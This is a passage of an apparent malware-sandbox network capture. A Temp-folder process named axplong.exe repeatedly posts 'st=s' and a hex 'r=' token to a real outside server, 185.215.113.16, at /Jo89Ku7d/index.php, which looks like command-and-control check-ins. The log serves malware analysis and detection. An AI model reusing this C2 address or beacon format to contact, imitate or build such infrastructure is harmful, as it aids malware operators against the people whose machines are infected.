                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:49.344259977 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    44192.168.2.656671185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:49.463923931 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:50.211724043 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:50.212703943 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:50.483169079 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    45192.168.2.656672185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:50.616368055 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:51.315181971 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:51.316215992 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:51.544382095 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    46192.168.2.656673185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:51.849008083 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:52.558371067 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:52.559288025 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:52.790786028 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    47192.168.2.656675185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:52.901201963 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:53.605561018 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:53.922036886 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:54.149058104 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    48192.168.2.656676185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:54.260812044 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:54.983449936 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:54.984317064 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:55.215068102 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    49192.168.2.656677185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:55.324876070 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:56.033041954 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:56.033844948 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:56.729276896 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    50192.168.2.656678185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:56.844624043 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:57.552449942 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:57.553263903 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:57.780615091 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    51192.168.2.656679185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:57.902918100 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:58.611336946 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:58.612085104 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:58.838637114 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    52192.168.2.656680185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:59.126724005 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:59.853976965 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:59.854847908 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:08:00.089365959 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    53192.168.2.656682185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:08:00.199563026 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:08:00.897063971 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:08:00.900763035 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:08:01.124598026 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    54192.168.2.656683185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:08:01.245424032 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:08:01.952981949 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:08:01.956552982 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:08:02.186938047 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    55192.168.2.656684185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:08:02.307837009 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:08:03.035101891 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
